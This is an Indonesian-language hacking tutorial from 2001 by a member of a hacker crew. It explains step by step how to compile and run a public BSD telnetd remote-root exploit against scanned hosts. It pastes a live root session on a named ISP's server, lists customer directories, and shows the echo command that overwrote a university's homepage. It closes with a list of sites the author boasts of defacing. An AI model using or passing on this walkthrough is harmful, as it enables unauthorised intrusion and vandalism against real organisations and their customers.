Title = Remote root Telnetd
* bug found by scut 2001/06/09
further research by smiler, zip, lorian and me.
thanks to zip's cool friend for giving me a testbed to play on
tested against: BSDI BSD/OS 4.1
NetBSD 1.5
FreeBSD 3.1
FreeBSD 4.0-REL
FreeBSD 4.2-REL
FreeBSD 4.3-BETA
FreeBSD 4.3-STABLE
FreeBSD 4.3-RELEASE
AUTHOR = JoeGoeL aka CyberRioT of MedanHacking
File = Private! only crew
Date = 2 Agustus 2001
Credit = TESO TEAM SECURITY
Greetz= Cronost,Crafter`13,r3v0lt,dis0rder,Tua-Xiong,Seven_Fly,Breng-Sex,LuVcris,
tapuz,Joe-Black,w|p,StripCode,Yourname
WOH(VAndal,[RaFa],FonE_TonE,r00t,n0|d,Nu|l)
FUCk = INDONESIAN MILITARY
sploit = 7350854.c www.hack.co.za
Dengan Berhasil nya Nge root www.melsa.net.id suatu provider berlokasi di Bandung,dengan deface situs www.bappeda-bandung.go.id,www.polban.ac.id,www.bankbali-bdg.co.id,www.sidola.com dll yg merupakan client pada ISP tsb
mari kita mulai,.,,
1. Pertama kamu dapati Shell Unix ,terserah (Linux,FreeBSD,SCO,SuNos dll)
kemudian uploap file 7350854.c dari www.hack.co.za ke shell tsb,kemudian ada kan
kompilasi
ex. # gcc -o bsd 7350854.c
2. Scan host yg Running varian Bsd spt keterangan di atas
3. scan port dgn tool yg bisa di cari di packetstormsecurity.org cari pscan.c
3. Apbila Port yg terbuka adalah port 23 (telnetd),kemungkinan bisa di ekploitasi untuk root
4. running sploit
ex. # ./bsd www.target.com
ini contoh yg pernah saya eksploitasi
[wbones@dblab Tool]$ ./bsd www.polban.ac.id
7350854 - x86/bsd telnetd remote root
by zip, lorian, smiler and scut.
check: PASSED, using 16mb mode
#############################################################################
ok baby, times are rough, we send 16mb traffic to the remote
telnet daemon process, it will spill badly. but then, there is no
other way, sorry...
## setting populators to populate heap address space
## number of setenvs (dots / network): 31500
## number of walks (percentage / cpu): 496140750
##
## the percentage is more realistic than the dots 
percent |--------------------------------------------------------| ETA |
99.37% |....................................................... | 00:00:06 |
::tunggu hingga 100% maka akan kelihatan spt :
## sleeping for 10 seconds to let the process recover
## ok, you should now have a root shell
## as always, after hard times, there is a reward...
:: tampilan begini, terus tekan enter
command: ��%
ls -al
total 19047
drwxr-xr-x 20 root wheel 512 Jul 31 20:37 .
drwxr-xr-x 20 root wheel 512 Jul 31 20:37 ..
-rw-r--r-- 2 root wheel 658 Nov 20 2000 .cshrc
-rw-r--r-- 2 root wheel 251 Nov 20 2000 .profile
-r--r--r-- 1 root wheel 4735 Nov 20 2000 COPYRIGHT
drwxr-xr-x 2 root wheel 1024 Jun 20 02:21 bin
drwxr-xr-x 3 root wheel 512 Jun 20 02:26 boot
drwxr-xr-x 2 root wheel 512 Jun 19 23:57 cdrom
lrwx------ 1 root wheel 11 Jul 31 15:58 compat -> /usr/compat
drwxr-xr-x 3 root wheel 13824 Jul 31 21:01 dev
drwxr-xr-x 2 root wheel 512 Jun 19 23:57 dist
drwxr-xr-x 15 root wheel 2560 Aug 1 06:00 etc
drwxr-xr-x 3 root wheel 4096 Jul 13 09:17 home
-r-xr-xr-x 1 root wheel 2086844 Jul 31 20:37 kernel
-r-xr-xr-x 1 root wheel 3258128 Nov 20 2000 kernel.GENERIC
-r-xr-xr-x 1 root wheel 2062958 Jun 23 11:24 kernel.old
-r-xr-xr-x 1 root wheel 2062958 Jun 23 10:51 kernel.prev
drwxr-xr-x 2 root wheel 512 Nov 20 2000 mnt
drwxr-xr-x 2 root wheel 3072 Jul 31 20:37 modules
drwxr-xr-x 2 root wheel 3072 Jun 20 11:37 modules.old
-rw-r--r-- 1 root wheel 91395 Jun 25 11:33 po-mode.el
dr-xr-xr-x 1 root wheel 512 Aug 1 06:29 proc
-rw------- 1 root wheel 97360 Jul 31 15:59 restoresymtable
drwxr-xr-x 5 root wheel 512 Aug 1 05:30 root
drwxr-xr-x 2 root wheel 2048 Jun 20 02:24 sbin
drwxr-xr-x 4 root wheel 1024 Jun 19 23:57 stand
lrwx------ 1 root wheel 11 Jul 31 15:58 sys -> usr/src/sys
lrwx------ 1 root wheel 8 Jul 31 15:58 tmp -> /var/tmp
drwxr-xr-x 14 root wheel 512 Jun 28 17:41 usr
drwxr-xr-x 4 root wheel 512 Jun 22 10:22 usr2
drwxr-xr-x 4 root wheel 512 Jun 26 11:30 usr3
drwxr-xr-x 18 root wheel 512 Jun 20 00:22 var
:: kita berhasil!!!!!!!!!!
who am i
root tty?? Aug 1 06:29
uname -a
FreeBSD www3.melsa.net.id 4.3-STABLE FreeBSD 4.3-STABLE #4: Tue Jul 31 20:36:18 JAVT 2001 root@www3.melsa.net.id:/usr/src/sys/compile/WWW3 i386
:: dapat Box root shell
:: cari Index.html nya biasa ya di di direktori home/www
cd home
ls -al
total 12
drwxr-xr-x 3 root wheel 4096 Jul 13 09:17 .
drwxr-xr-x 20 root wheel 512 Jul 31 20:37 ..
lrwx------ 1 root wheel 16 Jul 31 15:58 abadi -> /usr2/home/abadi
lrwx------ 1 root wheel 25 Jul 31 15:58 accounting.csb -> /usr3/home/accounting.csb
lrwx------ 1 root wheel 18 Jul 31 15:59 adm.csb -> /usr3/home/adm.csb
lrwx------ 1 root wheel 16 Jul 31 15:58 admin -> /usr2/home/admin
lrwx------ 1 root wheel 22 Jul 31 15:58 admin.iklan -> /usr3/home/admin.iklan
lrwx------ 1 root wheel 26 Jul 31 15:58 akunting.bpromo -> /usr3/home/akunting.bpromo
lrwx------ 1 root wheel 26 Jul 31 15:59 al_reda.gemafia -> /usr3/home/al_reda.gemafia
lrwx------ 1 root wheel 18 Jul 31 15:59 animbus -> /usr2/home/animbus
lrwx------ 1 root wheel 17 Jul 31 15:59 anzana -> /usr2/home/anzana
lrwx------ 1 root wheel 20 Jul 31 15:59 apep.reka -> /usr3/home/apep.reka
lrwx------ 1 root wheel 19 Jul 31 15:59 aprotech -> /usr2/home/aprotech
lrwx------ 1 root wheel 15 Jul 31 15:59 aris -> /usr2/home/aris
lrwx------ 1 root wheel 23 Jul 31 15:59 artforum.bae -> /usr3/home/artforum.bae
lrwx------ 1 root wheel 20 Jul 31 15:59 askhaindo -> /usr2/home/askhaindo
lrwx------ 1 root wheel 14 Jul 31 15:59 bae -> /usr2/home/bae
lrwx------ 1 root wheel 22 Jul 31 15:59 baligarment -> /usr2/home/baligarment
lrwx------ 1 root wheel 23 Jul 31 15:59 bankbali-bdg -> /usr2/home/bankbali-bdg
lrwx------ 1 root wheel 18 Jul 31 15:59 bappeda -> /usr2/home/bappeda
lrwx------ 1 root wheel 17 Jul 31 15:59 bening -> /usr2/home/bening
lrwx------ 1 root wheel 24 Jul 31 15:59 benny.bethany -> /usr3/home/benny.bethany
lrwx------ 1 root wheel 21 Jul 31 15:59 bethanydoa -> /usr2/home/bethanydoa
lrwx------ 1 root wheel 22 Jul 31 15:59 bhima.topaz -> /usr3/home/bhima.topaz
lrwx------ 1 root wheel 15 Jul 31 15:59 bhtv -> /usr2/home/bhtv
lrwx------ 1 root wheel 26 Jul 31 15:59 bidang3.bappeda -> /usr3/home/bidang3.bappeda
lrwx------ 1 root wheel 26 Jul 31 15:59 bidang5.bappeda -> /usr3/home/bidang5.bappeda
lrwx------ 1 root wheel 18 Jul 31 15:59 bigfash -> /usr2/home/bigfash
lrwx------ 1 root wheel 15 Jul 31 15:59 bita -> /usr2/home/bita
lrwx------ 1 root wheel 18 Jul 31 15:59 bowling -> /usr2/home/bowling
lrwx------ 1 root wheel 19 Jul 31 15:59 boy.reka -> /usr3/home/boy.reka
lrwx------ 1 root wheel 17 Jul 31 15:59 bpromo -> /usr2/home/bpromo
lrwx------ 1 root wheel 23 Jul 31 15:59 bptc.bethany -> /usr3/home/bptc.bethany
lrwx------ 1 root wheel 19 Jul 31 15:59 bratatex -> /usr2/home/bratatex
lrwx------ 1 root wheel 22 Jul 31 15:59 budi.weaver -> /usr3/home/budi.weaver
lrwx------ 1 root wheel 26 Jul 31 15:59 buletin.bethany -> /usr3/home/buletin.bethany
lrwx------ 1 root wheel 17 Jul 31 15:59 busana -> /usr2/home/busana
lrwx------ 1 root wheel 18 Jul 31 15:59 cci-bdg -> /usr2/home/cci-bdg
lrwx------ 1 root wheel 15 Jul 31 15:59 cela -> /usr2/hom
:: lihat ada polban,bappeda,bankbali-bdg,bethanydoa dll yg merupakan websites
:: Kemudian pindah ke direktori polban
cd polban
cd webpages
ls -al
total 34
drwxr-xr-x 10 polban corp 512 Aug 1 04:43 .
drwxr-xr-x 4 polban corp 512 May 22 2000 ..
drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _borders
drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _derived
drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _fpclass
drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _overlay
drwxr-xr-x 2 polban corp 512 Jun 21 15:16 _private
drwxr-xr-x 3 polban corp 512 Jun 21 15:18 _themes
drwxr-xr-x 2 polban corp 512 Jun 21 15:18 _vti_pvt
drwxr-xr-x 2 polban corp 512 Jun 21 15:17 images
-rw-r--r-- 1 root corp 75 Aug 1 04:43 index.html
-rw-r--r-- 1 polban corp 992 Jun 21 15:18 index.old
-rw-r--r-- 1 root corp 167 Aug 1 04:00 medan.htm
-rw-r--r-- 1 root corp 70 Aug 1 03:45 read.htm
-rw-r--r-- 1 root corp 77 Aug 1 03:47 surat.htm
-rw-r--r-- 1 root corp 117 Aug 1 03:54 warna.htm
-rw-r--r-- 1 root corp 18 Aug 1 03:52 yoyo
:: ternyata index nya terletak di sini....
:: ada kan deface 
) LoL heheheheh Babi kaw wepe jgn kaw ganggu nancy ku!!!(sedikit peringatan buat yg sering usil )
::: ayo kita deface!!!!!!!!
echo " JoeGoeL,Cronost,Crafter`13,r3v0lt,Tua-Xiong and dis0rder own U poltek Bandung Find Us at Medanhacking on Irc.dal.net greetz All Medanhacking Crew " > index.html
:: selesai !!! buka www.polban.ac.id ,akan spt yg diatas
:: di bawah ini yg kena saya deface
:: Balik Ke Shell Kita tekan Ctrl+C
[wbones@dblab Tool]$
www.bappeda-bandung.go.id
www.bankbali-bdg.co.id
www.polban.ac.id
http://www.netweaver.web.id/
http://www.priokport.co.id/
www.rdb.or.id/
www.pltp-kamojang.co.id/
www.mbt-kons.co.id/
http://www.metamasa.com/
http://www.ultima.co.id/
http://www.p5d.or.id/
http://www.quasar.co.id/
http://www.bae.or.id/
http://www.bita.co.id/
http://www.mbt-kons.co.id/
http://www.mkn.co.id/
http://www.situsfoto.com/
::: Ok see Ya Viva MedanHacking Crew find it htpp://medanhacking.has.it
::: Buat Romi aka Seven_Fly gimana Buku Linux dan Perl nya? udah belom sampai nya
::: Buat dis0rder tolong transfer ke bhs Inggris dan ibrani!!!!!!!!!!!!
Copyright JoeGoeL aka CyberRioT, CyberRioT@apexmail.com 2001
sampai Jumpa di Tutor lain nya!!!!!
0 Responses to “Remote root Telnetd”